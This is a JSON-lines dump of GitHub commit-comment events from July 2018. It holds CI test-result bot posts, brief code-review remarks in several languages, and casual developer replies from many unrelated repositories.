{"id":"8041545146","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897316,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-31T03:38:31Z","updated_at":"2018-07-31T03:38:31Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1702 of 1702 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.08%25-green.png)</a>\n"}},"created_at":"2018-07-31T03:38:31Z"}
{"id":"8041548755","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897321,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T03:39:58Z","updated_at":"2018-07-31T03:39:58Z","author_association":"COLLABORATOR","body":"Aaah I hadn't properly de-dented the FFT time when I merged. Okay so the FFT is holding it back. This is even more upsetting as cufft is about as good as it gets.."}},"created_at":"2018-07-31T03:39:58Z"}
{"id":"8041550077","type":"CommitCommentEvent","actor":{"login":"kassens"},"repo":{"name":"facebook/relay"},"payload":{"comment":{"id":29897322,"position":null,"line":null,"path":null,"commit_id":"9d71698d575b9e917cf5b3b0ad197858bc0af8dc","created_at":"2018-07-31T03:40:25Z","updated_at":"2018-07-31T03:40:25Z","author_association":"MEMBER","body":"Sorry about that, looking into the best fix now. (It's a bit complicated as this is consumed differently internally)"}},"created_at":"2018-07-31T03:40:25Z"}
{"id":"8041554240","type":"CommitCommentEvent","actor":{"login":"fengT-T"},"repo":{"name":"xtuJSer/CoCoMusic"},"payload":{"comment":{"id":29897324,"position":null,"line":null,"path":null,"commit_id":"26684e7dd0c0ba19ac026a9103121161ef2e7b82","created_at":"2018-07-31T03:42:04Z","updated_at":"2018-07-31T03:42:04Z","author_association":"COLLABORATOR","body":"2333333333333333333333"}},"created_at":"2018-07-31T03:42:04Z"}
{"id":"8041560470","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29897331,"position":null,"line":null,"path":null,"commit_id":"54b231de7a77735ead1298e48ec3a15ec68bfe68","created_at":"2018-07-31T03:44:18Z","updated_at":"2018-07-31T03:44:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Routes for Requests](https://trello.com/c/aviWWGaB/19-routes-for-requests)"}},"created_at":"2018-07-31T03:44:18Z"}
{"id":"8041562296","type":"CommitCommentEvent","actor":{"login":"arturi"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29897335,"position":null,"line":null,"path":null,"commit_id":"04323251cffe0b6bb28e2ec9b54f1c9f254b3812","created_at":"2018-07-31T03:44:59Z","updated_at":"2018-07-31T03:44:59Z","author_association":"COLLABORATOR","body":"Thanks, @AJvanLoon!"}},"created_at":"2018-07-31T03:44:59Z"}
{"id":"8041564367","type":"CommitCommentEvent","actor":{"login":"shahidsaifi92"},"repo":{"name":"shahidsaifi92/portfolio"},"payload":{"comment":{"id":29897340,"position":null,"line":null,"path":null,"commit_id":"031540d9effc93f7d91697543eeaf7942be5dedd","created_at":"2018-07-31T03:45:48Z","updated_at":"2018-07-31T03:45:48Z","author_association":"OWNER","body":"Certificates to upload"}},"created_at":"2018-07-31T03:45:48Z"}
{"id":"8041568488","type":"CommitCommentEvent","actor":{"login":"eseunghwan"},"repo":{"name":"eseunghwan/pybillboard-js"},"payload":{"comment":{"id":29897348,"position":null,"line":null,"path":null,"commit_id":"85648e4684277d9f5d23eb59227259581927d319","created_at":"2018-07-31T03:47:25Z","updated_at":"2018-07-31T03:47:25Z","author_association":"OWNER","body":"update install command properly"}},"created_at":"2018-07-31T03:47:25Z"}
{"id":"8041569290","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29897350,"position":null,"line":null,"path":null,"commit_id":"9651735f2724bc6632fcaa311935dd4e28a5ddc4","created_at":"2018-07-31T03:47:44Z","updated_at":"2018-07-31T03:47:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [When there is only one element in a list the JSON is only an Object not an Array](https://trello.com/c/xNAJDpJ7/21-when-there-is-only-one-element-in-a-list-the-json-is-only-an-object-not-an-array)"}},"created_at":"2018-07-31T03:47:44Z"}
{"id":"8041569538","type":"CommitCommentEvent","actor":{"login":"Gp2mv3"},"repo":{"name":"zo0r/react-native-push-notification"},"payload":{"comment":{"id":29897351,"position":null,"line":null,"path":null,"commit_id":"1c6d7b0e10756c17ac16f51abb0fd6f6803e8770","created_at":"2018-07-31T03:47:50Z","updated_at":"2018-07-31T03:47:50Z","author_association":"COLLABORATOR","body":"It depends on zo0or. I sent him emails to publish on npm but I have no answer."}},"created_at":"2018-07-31T03:47:50Z"}
{"id":"8041571248","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"AllenChong/eobot-api"},"payload":{"comment":{"id":29897355,"position":null,"line":null,"path":null,"commit_id":"24c24dd7df4ec79d164cdcba3699afb46e1c784c","created_at":"2018-07-31T03:48:26Z","updated_at":"2018-07-31T03:48:26Z","author_association":"OWNER","body":"24c24dd"}},"created_at":"2018-07-31T03:48:26Z"}
{"id":"8041571425","type":"CommitCommentEvent","actor":{"login":"webvictim"},"repo":{"name":"kaniini/antissh"},"payload":{"comment":{"id":29897357,"position":5,"line":8,"path":"antissh.conf.example","commit_id":"f6a3985fb6f24cb87ee8dfe3f013c29363cc11d6","created_at":"2018-07-31T03:48:29Z","updated_at":"2018-07-31T03:48:29Z","author_association":"NONE","body":"Yep, that’s what it was. Fixed now, thanks.\n\nOn Tue, 31 Jul 2018 at 00:00, William Pitcock <notifications@github.com>\nwrote:\n\n> it's probably the quotes. try the new version, it will dump irc logs to\n> stdout.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kaniini/antissh/commit/f6a3985fb6f24cb87ee8dfe3f013c29363cc11d6#commitcomment-29897132>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA2zHQ24tGHocxINB0nhTrMpaBiZz6yXks5uL8hYgaJpZM4VmPg->\n> .\n>\n"}},"created_at":"2018-07-31T03:48:29Z"}
{"id":"8041574645","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"polilluminato/eobot-kotlin"},"payload":{"comment":{"id":29897365,"position":null,"line":null,"path":null,"commit_id":"e594aabf3be4433b6d48a3b8dbc396d983328e4a","created_at":"2018-07-31T03:49:31Z","updated_at":"2018-07-31T03:49:31Z","author_association":"NONE","body":"e594aab"}},"created_at":"2018-07-31T03:49:31Z"}
{"id":"8041581850","type":"CommitCommentEvent","actor":{"login":"SquishedPotatoe"},"repo":{"name":"revilheart/ESGST"},"payload":{"comment":{"id":29897383,"position":178,"line":178,"path":"Extension/Modules/giveaways/GridView-8.0.0.js","commit_id":"1428c66874bd4fcbfd0ca97499a70e13827975dc","created_at":"2018-07-31T03:51:57Z","updated_at":"2018-07-31T03:51:57Z","author_association":"NONE","body":"Needs a space after by"}},"created_at":"2018-07-31T03:51:57Z"}
{"id":"8041582831","type":"CommitCommentEvent","actor":{"login":"b-abarchi"},"repo":{"name":"b-abarchi/C-codes"},"payload":{"comment":{"id":29897387,"position":null,"line":null,"path":null,"commit_id":"62732be78d0c289d242b7dfb0553ccf0acb9f46c","created_at":"2018-07-31T03:52:19Z","updated_at":"2018-07-31T03:52:19Z","author_association":"OWNER","body":"Sorting Array DT"}},"created_at":"2018-07-31T03:52:19Z"}
{"id":"8041583347","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29897389,"position":null,"line":null,"path":null,"commit_id":"38966a8a5f37c8b862420884e6be069dfbc07920","created_at":"2018-07-31T03:52:32Z","updated_at":"2018-07-31T03:52:32Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-332](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-332).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-332-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-31T03:52:32Z"}
{"id":"8041583609","type":"CommitCommentEvent","actor":{"login":"useinternet"},"repo":{"name":"useinternet/JGameEngine"},"payload":{"comment":{"id":29897390,"position":7,"line":7,"path":"JRenderEngine/Font.cpp","commit_id":"83228beb2b425843daeb76297296feb0e482ad8a","created_at":"2018-07-31T03:52:39Z","updated_at":"2018-07-31T03:52:39Z","author_association":"OWNER","body":"Font 클래스  \r\n- 파라미터를 더 받아서 능동적으로 사이즈조절할수있게 코드다듬기"}},"created_at":"2018-07-31T03:52:39Z"}
{"id":"8041583711","type":"CommitCommentEvent","actor":{"login":"iamzinzi"},"repo":{"name":"iamzinzi/printf"},"payload":{"comment":{"id":29897391,"position":16,"line":21,"path":"print_number.c","commit_id":"abc6ae05a0b3bcc02bb44bd5835e8a6d9d84a853","created_at":"2018-07-31T03:52:41Z","updated_at":"2018-07-31T03:52:41Z","author_association":"OWNER","body":"n is unsigned int, to handle bit overflow in the case that num is INT_MIN."}},"created_at":"2018-07-31T03:52:41Z"}
{"id":"8041584012","type":"CommitCommentEvent","actor":{"login":"lazedo"},"repo":{"name":"2600hz/kazoo"},"payload":{"comment":{"id":29897392,"position":null,"line":null,"path":null,"commit_id":"39bd6621ed6d6e3c520568dc5c7eac9b12a43bb4","created_at":"2018-07-31T03:52:48Z","updated_at":"2018-07-31T03:52:48Z","author_association":"MEMBER","body":"@bazemoreb no"}},"created_at":"2018-07-31T03:52:48Z"}
{"id":"8041585046","type":"CommitCommentEvent","actor":{"login":"iamzinzi"},"repo":{"name":"iamzinzi/printf"},"payload":{"comment":{"id":29897394,"position":25,"line":29,"path":"print_number.c","commit_id":"abc6ae05a0b3bcc02bb44bd5835e8a6d9d84a853","created_at":"2018-07-31T03:53:15Z","updated_at":"2018-07-31T03:53:15Z","author_association":"OWNER","body":"Solely storing the value of n to be used again"}},"created_at":"2018-07-31T03:53:15Z"}
{"id":"8041585385","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897395,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-31T03:53:22Z","updated_at":"2018-07-31T03:53:22Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2952 of 2952 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T03:53:22Z"}
{"id":"8041586883","type":"CommitCommentEvent","actor":{"login":"troggy"},"repo":{"name":"parsec-labs/solevm-truffle"},"payload":{"comment":{"id":29897399,"position":6,"line":234,"path":"contracts/EthereumRuntime.sol","commit_id":"5a7068171f888354e380d23c650015dcb484fc8f","created_at":"2018-07-31T03:53:59Z","updated_at":"2018-07-31T03:53:59Z","author_association":"MEMBER","body":"This is exactly the problem I am trying to understand.\r\nIt is like this:\r\n1. On a current master branch there is no OoG currently. If I add these two methods to master it will start to fail with OoG.\r\n2. I decide to reduce contract size by externalizing libraries - this PR is created. But the effect is opposite — contract becomes twice as big as before and now fails even without these two methods added"}},"created_at":"2018-07-31T03:53:59Z"}
{"id":"8041588658","type":"CommitCommentEvent","actor":{"login":"KyleSiefring"},"repo":{"name":"tdaede/rd_tool"},"payload":{"comment":{"id":29897403,"position":84,"line":271,"path":"rd_server.py","commit_id":"3fbc7f663b36c004421deace5e457e8c359ebed5","created_at":"2018-07-31T03:54:42Z","updated_at":"2018-07-31T03:54:42Z","author_association":"CONTRIBUTOR","body":"It seems we iterate though slots to find finished or canceled work. I'm guessing machines disappear and reappear then finish their work without writing the results."}},"created_at":"2018-07-31T03:54:42Z"}
{"id":"8041589135","type":"CommitCommentEvent","actor":{"login":"useinternet"},"repo":{"name":"useinternet/JGameEngine"},"payload":{"comment":{"id":29897405,"position":7,"line":7,"path":"JRenderEngine/RenderTexture.h","commit_id":"83228beb2b425843daeb76297296feb0e482ad8a","created_at":"2018-07-31T03:54:52Z","updated_at":"2018-07-31T03:54:52Z","author_association":"OWNER","body":"RenderTexture 클래스\r\n\r\n- Scene 클래스를 만들어서 각 오브젝트 그리는거에맞게 텍스쳐를 각각 그려서Scene을 이어붙이는 형식으로 만들것"}},"created_at":"2018-07-31T03:54:52Z"}
{"id":"8041589791","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29897412,"position":null,"line":null,"path":null,"commit_id":"33e8b62d56923c6aa846a4e466933dfb122dff07","created_at":"2018-07-31T03:55:06Z","updated_at":"2018-07-31T03:55:06Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-31T03:55:06Z"}
{"id":"8041590139","type":"CommitCommentEvent","actor":{"login":"dadoczek"},"repo":{"name":"jarek0377/Kursy"},"payload":{"comment":{"id":29897414,"position":null,"line":null,"path":null,"commit_id":"569dad2e310f1161f273dd6f7e6ff1d757807e4d","created_at":"2018-07-31T03:55:11Z","updated_at":"2018-07-31T03:55:11Z","author_association":"NONE","body":"Brak opisu commita staraj się zawsze dawać opis co wrzucasz na server github'owy"}},"created_at":"2018-07-31T03:55:11Z"}
{"id":"8041594436","type":"CommitCommentEvent","actor":{"login":"dadoczek"},"repo":{"name":"jarek0377/Kursy"},"payload":{"comment":{"id":29897430,"position":5,"line":14,"path":"C#/wyrazenia algebraiczne  03-01/wyrazenia algebraiczne  03-01/Program.cs","commit_id":"569dad2e310f1161f273dd6f7e6ff1d757807e4d","created_at":"2018-07-31T03:56:30Z","updated_at":"2018-07-31T03:56:30Z","author_association":"NONE","body":"Świetnie! porządek w kodzie jest najważniejszy!"}},"created_at":"2018-07-31T03:56:30Z"}
{"id":"8041597368","type":"CommitCommentEvent","actor":{"login":"dadoczek"},"repo":{"name":"jarek0377/Kursy"},"payload":{"comment":{"id":29897439,"position":15,"line":23,"path":"C#/wyrazenia algebraiczne  03-01/wyrazenia algebraiczne  03-01/Program.cs","commit_id":"569dad2e310f1161f273dd6f7e6ff1d757807e4d","created_at":"2018-07-31T03:57:26Z","updated_at":"2018-07-31T03:57:26Z","author_association":"NONE","body":"Te puste linie powinny zniknąć, nie wygląda to zbyt estetycznie"}},"created_at":"2018-07-31T03:57:26Z"}
{"id":"8041598575","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29897441,"position":null,"line":null,"path":null,"commit_id":"57d83fc9d19e91068d2bce61df2debde36db9014","created_at":"2018-07-31T03:57:55Z","updated_at":"2018-07-31T03:57:55Z","author_association":"CONTRIBUTOR","body":"Also things jump by pressing \"W\" once and only if you click out of the program then click the program again"}},"created_at":"2018-07-31T03:57:55Z"}
{"id":"8041606824","type":"CommitCommentEvent","actor":{"login":"dadoczek"},"repo":{"name":"jarek0377/Kursy"},"payload":{"comment":{"id":29897465,"position":null,"line":null,"path":null,"commit_id":"bb0e129965439b2e9f6bbcdbd38c0d05ca741f87","created_at":"2018-07-31T04:00:52Z","updated_at":"2018-07-31T04:00:52Z","author_association":"NONE","body":"Nie wiem dlaczego ale utworzyłeś 2 razy ten sam projekt. Co do wiadomości commit, staraj się wpisywać nazwę filmu wideo, a nie samego zadania. Dzięki temu będę wiedział co dokładnie zostało zrobione\r\n"}},"created_at":"2018-07-31T04:00:52Z"}
{"id":"8041610901","type":"CommitCommentEvent","actor":{"login":"jakevdp"},"repo":{"name":"altair-viz/altair"},"payload":{"comment":{"id":29897471,"position":null,"line":null,"path":null,"commit_id":"4d7078b78fe9201c8bf2ab0cb403ac73a32115e0","created_at":"2018-07-31T04:02:19Z","updated_at":"2018-07-31T04:02:19Z","author_association":"MEMBER","body":"I think a financial example is fine"}},"created_at":"2018-07-31T04:02:19Z"}
{"id":"8041611433","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897472,"position":null,"line":null,"path":null,"commit_id":"4c51d62b5318d9686058be09f0d710f58d61f917","created_at":"2018-07-31T04:02:32Z","updated_at":"2018-07-31T04:02:32Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: OK (2963 of 2964 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 628\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4c51d62b5318d9686058be09f0d710f58d61f917-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4c51d62b5318d9686058be09f0d710f58d61f917-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T04:02:32Z"}
{"id":"8041611674","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897473,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T04:02:38Z","updated_at":"2018-07-31T04:02:38Z","author_association":"COLLABORATOR","body":"Hrm."}},"created_at":"2018-07-31T04:02:38Z"}
{"id":"8041614510","type":"CommitCommentEvent","actor":{"login":"SquishedPotatoe"},"repo":{"name":"revilheart/ESGST"},"payload":{"comment":{"id":29897480,"position":71,"line":50620,"path":"Extension/esgst.js","commit_id":"636f6d02e205107e9413a6c0d89684a008df4263","created_at":"2018-07-31T04:03:51Z","updated_at":"2018-07-31T04:03:51Z","author_association":"NONE","body":"Maybe use .table__row-inner-wrap instead ? because these are in table__column--width-fill and table__column--width-small"}},"created_at":"2018-07-31T04:03:51Z"}
{"id":"8041616097","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29897483,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T04:04:31Z","updated_at":"2018-07-31T04:04:31Z","author_association":"COLLABORATOR","body":"So I had to disable `EUID_ASSERT()` in the `resolve_*` functions since `expand_home()` was being called both as root and as the regular user (ostensibly at different times). I tried just using `EUID_USER()` at the beginning and `EUID_ROOT()` at the end, but that meant the profile wouldn't load. Not using `EUID_USER()` at the beginning would fail the assertion. What do people think?"}},"created_at":"2018-07-31T04:04:31Z"}
{"id":"8041616545","type":"CommitCommentEvent","actor":{"login":"compositeprimes"},"repo":{"name":"material-components/material-components-ios"},"payload":{"comment":{"id":29897485,"position":47,"line":590,"path":"components/Chips/src/MDCChipView.m","commit_id":"9fc828498f6469326a447f5664ab4f1f6977f14f","created_at":"2018-07-31T04:04:43Z","updated_at":"2018-07-31T04:04:43Z","author_association":"CONTRIBUTOR","body":"Overriding a getter for a property that is still settable is not a good idea for a public API. Clients can still call\r\n`chipView.accessibilityLabel = @\"foo\"` and expect that it works, but it will not work anymore. You need to be able to support the property as expected by the API."}},"created_at":"2018-07-31T04:04:43Z"}
{"id":"8041622515","type":"CommitCommentEvent","actor":{"login":"zanedb"},"repo":{"name":"hackclub/hackclub"},"payload":{"comment":{"id":29897492,"position":7,"line":4,"path":"workshops/personal_website/README.md","commit_id":"41246672d7f14357fa8fb341f61e03272cdf6b17","created_at":"2018-07-31T04:07:13Z","updated_at":"2018-07-31T04:07:13Z","author_association":"MEMBER","body":"No no no"}},"created_at":"2018-07-31T04:07:13Z"}
{"id":"8041624047","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":29897493,"position":null,"line":null,"path":null,"commit_id":"883a0ab631c00862ed1c6f1b353f96a9a3f58402","created_at":"2018-07-31T04:07:51Z","updated_at":"2018-07-31T04:07:51Z","author_association":"OWNER","body":"@rachmadaniHaryono can you please check the build break?"}},"created_at":"2018-07-31T04:07:51Z"}
{"id":"8041634885","type":"CommitCommentEvent","actor":{"login":"adamg88"},"repo":{"name":"BayLibre/u-boot"},"payload":{"comment":{"id":29897510,"position":null,"line":null,"path":null,"commit_id":"427ce42b1df536ef889bc051a164383d812f25df","created_at":"2018-07-31T04:12:20Z","updated_at":"2018-07-31T04:12:20Z","author_association":"NONE","body":"are the build instructions different for the latest vendor uboot? I noticed there is no longer any fip directory"}},"created_at":"2018-07-31T04:12:20Z"}
{"id":"8041643775","type":"CommitCommentEvent","actor":{"login":"meetDeveloper"},"repo":{"name":"meetDeveloper/googleDictionaryAPI"},"payload":{"comment":{"id":29897535,"position":null,"line":null,"path":null,"commit_id":"1dc6365d1b68daacec98100cdd0128b04cf25947","created_at":"2018-07-31T04:16:08Z","updated_at":"2018-07-31T04:16:08Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/623ac46c-aeaa-4433-a262-223430c2e0af?env_id=ibm%3Ayp%3Aus-south \"googleDictionaryAPI\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/43a8bfc9-4989-4464-8299-979f59631a9c?env_id=ibm%3Ayp%3Aus-south \"googleDictionaryAPI\") deployed [googleDictionaryAPI](https://github.com/meetDeveloper/googleDictionaryAPI/releases/tag/deploy-ibm-yp-eu-gb-lifeplusplus-API-s-20180731-041607 \"deploy-ibm-yp-eu-gb-lifeplusplus-API-s-20180731-041607\") to [API's](https://console.bluemix.net/apps/0971aef0-04d8-454a-b263-f77d06d21309?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:lifeplusplus:API's\"), including this commit"}},"created_at":"2018-07-31T04:16:08Z"}
{"id":"8041645126","type":"CommitCommentEvent","actor":{"login":"rbray89"},"repo":{"name":"home-assistant/hassos"},"payload":{"comment":{"id":29897537,"position":20,"line":20,"path":"buildroot-external/board/tinker/patches/uboot/0001-Support-HassOS-bootstate-partition.patch","commit_id":"b4eadf1566cbf2693a67abcb9448fa3198db86aa","created_at":"2018-07-31T04:16:43Z","updated_at":"2018-07-31T04:16:43Z","author_association":"NONE","body":"Wouldn't this belong in the uboot configuration fragment rather than a patch?"}},"created_at":"2018-07-31T04:16:43Z"}
{"id":"8041668423","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29897607,"position":24,"line":69,"path":"src/main/java/ch/njol/skript/expressions/ExprIdOf.java","commit_id":"c904c55a27501c9ed681528b9620a3afd64cceb6","created_at":"2018-07-31T04:26:34Z","updated_at":"2018-07-31T04:26:34Z","author_association":"MEMBER","body":"was there an issue with Skript#methodExists here?"}},"created_at":"2018-07-31T04:26:34Z"}
{"id":"8041671368","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897619,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-31T04:27:49Z","updated_at":"2018-07-31T04:27:49Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2952 of 2952 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T04:27:49Z"}
{"id":"8041673345","type":"CommitCommentEvent","actor":{"login":"huyhkoi1310"},"repo":{"name":"huyhkoi1310/huykhoi1310.github.io"},"payload":{"comment":{"id":29897622,"position":null,"line":null,"path":null,"commit_id":"bf188405bc8517cf7a5538f2d0613ec5ebe63215","created_at":"2018-07-31T04:28:39Z","updated_at":"2018-07-31T04:28:39Z","author_association":"OWNER","body":"hay\r\n"}},"created_at":"2018-07-31T04:28:39Z"}
{"id":"8041675890","type":"CommitCommentEvent","actor":{"login":"AlainODea"},"repo":{"name":"aws/aws-sdk-java"},"payload":{"comment":{"id":29897627,"position":99,"line":99,"path":"aws-java-sdk-core/src/main/java/com/amazonaws/auth/profile/internal/BasicProfileConfigLoader.java","commit_id":"15ca1bb2f92d5a84a11c2bb2b48002a88ea9caae","created_at":"2018-07-31T04:29:44Z","updated_at":"2018-07-31T04:29:44Z","author_association":"NONE","body":"Who is right, AWS Java SDK or botocore?\r\nhttps://github.com/boto/botocore/blob/develop/botocore/configloader.py#L208-L222\r\n\r\nBetween you it is seemingly impossible to write ~/.aws/config in a compliant way."}},"created_at":"2018-07-31T04:29:44Z"}
{"id":"8041684455","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29897640,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-31T04:33:18Z","updated_at":"2018-07-31T04:33:18Z","author_association":"OWNER","body":"Mmhh... Of course we could test this in all possible configurations. I think, however, that is established beyond all possible doubt that this is an Elo gain, having passed 3 times SPRT. I think the correct thing would be to commit and then try to improve.\r\n\r\nIf anybody wants, I have already squashed everything in threadsVoting_PR branch."}},"created_at":"2018-07-31T04:33:18Z"}
{"id":"8041686511","type":"CommitCommentEvent","actor":{"login":"DigtalTony415"},"repo":{"name":"DigtalTony415/Episode-Dice"},"payload":{"comment":{"id":29897643,"position":null,"line":null,"path":null,"commit_id":"19b9723ef55e6a89e348b756edb9c0c9fe9d4547","created_at":"2018-07-31T04:34:12Z","updated_at":"2018-07-31T04:34:12Z","author_association":"OWNER","body":"program completes in 1 call and prints to terminal screen."}},"created_at":"2018-07-31T04:34:12Z"}
{"id":"8041687119","type":"CommitCommentEvent","actor":{"login":"AmmarTheTrainer"},"repo":{"name":"AmmarTheTrainer/Ch5-P7-ConstData"},"payload":{"comment":{"id":29897648,"position":null,"line":null,"path":null,"commit_id":"a5d52e6490d92e1110c00cc0d8d5aba61c4a6bec","created_at":"2018-07-31T04:34:28Z","updated_at":"2018-07-31T04:34:28Z","author_association":"OWNER","body":"merging experience one"}},"created_at":"2018-07-31T04:34:28Z"}
{"id":"8041689618","type":"CommitCommentEvent","actor":{"login":"DigtalTony415"},"repo":{"name":"DigtalTony415/Episode-Dice"},"payload":{"comment":{"id":29897654,"position":null,"line":null,"path":null,"commit_id":"393bae7ba0d786b9ec16128c3ec2cae155060f55","created_at":"2018-07-31T04:35:34Z","updated_at":"2018-07-31T04:35:34Z","author_association":"OWNER","body":"Program pops up in a GUI window and the calculation operations are called with each click of the button, printing a new result each time."}},"created_at":"2018-07-31T04:35:34Z"}
{"id":"8041691187","type":"CommitCommentEvent","actor":{"login":"linkzeldagg"},"repo":{"name":"higadjan/miniRAID"},"payload":{"comment":{"id":29897657,"position":42,"line":492,"path":"js/entities/mobs.js","commit_id":"f224e8d4afb661a41a74779ea5dd3a38bcf0cbe7","created_at":"2018-07-31T04:36:16Z","updated_at":"2018-07-31T04:36:16Z","author_association":"NONE","body":"WWWWTTTTFFFFFF 40000000000000000000000000000000"}},"created_at":"2018-07-31T04:36:16Z"}
